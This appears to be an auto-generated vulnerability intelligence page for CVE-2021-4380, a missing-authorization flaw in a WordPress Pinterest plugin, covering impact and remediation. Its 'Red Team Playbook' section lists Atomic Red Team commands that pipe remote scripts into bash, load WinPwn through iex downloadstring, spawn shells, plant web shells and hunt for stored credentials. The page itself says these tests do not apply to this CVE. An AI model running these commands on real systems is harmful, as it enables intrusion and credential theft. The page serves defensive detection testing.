CVE-2021-4380
Overview
This vulnerability is an authorization bypass caused by missing capability checks within the Pinterest Automatic WordPress plugin. Specifically, the functions 'wp_pinterest_automatic_parse_request' and the 'process_form.php' script lack proper verification of user privileges. This flaw affects versions up to and including 1.14.3, allowing unauthorized access to sensitive plugin operations.
Vulnerability Description
The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.
Impact
An unauthenticated attacker can exploit this vulnerability to update arbitrary site options, including creating new administrative user accounts or redirecting visitors to malicious sites. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), allowing remote exploitation over the network. This can lead to full site compromise, unauthorized administrative access, and potential redirection-based phishing or malware distribution, severely impacting site integrity and trust.
Solution
Upgrade the ValvePress Pinterest Automatic plugin to a version later than 1.14.3 where this authorization bypass is fixed. Refer to the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/e4fdc902-4cfe-4116-a294-9a0fcb2de346 for patch details and update instructions. Additionally, the NinTechNet blog confirms the fix in the latest plugin release. Applying the official update is the recommended remediation to restore proper capability checks and secure the affected endpoints.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Pinterest Automatic plugin for WordPress arises from inadequate authorization checks within critical functions, specifically the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script. This oversight allows unauthorized users to bypass security measures, enabling them to execute actions that should be restricted to authenticated users. The absence of capability checks means that any attacker can send crafted requests to the affected endpoints, potentially altering site configurations and user roles without proper authentication. This flaw is particularly concerning as it can lead to the creation of new administrative accounts, granting attackers full control over the compromised WordPress site.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage automated scripts or manual methods to send requests to the vulnerable endpoints, manipulating parameters to perform unauthorized actions. For instance, by exploiting the lack of checks, an attacker could modify site options to create new admin accounts or redirect users to malicious sites, thereby compromising the integrity of the website and its visitors. The simplicity of the attack, combined with the high impact of the potential outcomes, makes this vulnerability particularly attractive to malicious actors.
The real-world implications of this vulnerability are significant, particularly for businesses relying on WordPress for their online presence. An attacker gaining administrative access can lead to data breaches, loss of sensitive customer information, and damage to the brand's reputation. Furthermore, the ability to redirect users can result in phishing attacks, where unsuspecting visitors may be tricked into providing personal information. The financial repercussions can be severe, including loss of revenue, legal liabilities, and costs associated with incident response and recovery. Organizations may also face regulatory scrutiny if customer data is compromised, leading to further reputational damage and financial penalties.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Pinterest Automatic plugin and other WordPress components is crucial, as updates often include security patches that address known vulnerabilities. Additionally, employing web application firewalls (WAF) can help filter out malicious requests before they reach the application layer. Monitoring logs for unusual activity, such as unauthorized changes to user roles or site configurations, can also aid in early detection of exploitation attempts. Furthermore, organizations should educate their staff about security best practices, including the importance of strong authentication mechanisms and the need for regular security assessments.
In conclusion, the vulnerability in the Pinterest Automatic plugin for WordPress presents a critical risk due to its potential for unauthorized access and control over affected sites. The ease of exploitation and the severe consequences of successful attacks underscore the necessity for proactive security measures. By prioritizing timely updates, employing robust detection mechanisms, and fostering a culture of security awareness, organizations can significantly reduce their exposure to this and similar vulnerabilities, safeguarding their digital assets and maintaining trust with their users.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Valvepress | Pinterest Automatic Pin | All |
cpe:2.3:a:valvepress:pinterest_automatic_pin:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-4380 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve |
| blog.nintechnet.com |
GitHub CVE
|
https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-pinterest-automatic-plugin/ |
| wpscan.com |
GitHub CVE
|
https://wpscan.com/vulnerability/ffd344fd-de2c-4f27-8932-41aa0a3c3d05 |
| acunetix.com |
GitHub CVE
|
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3/ |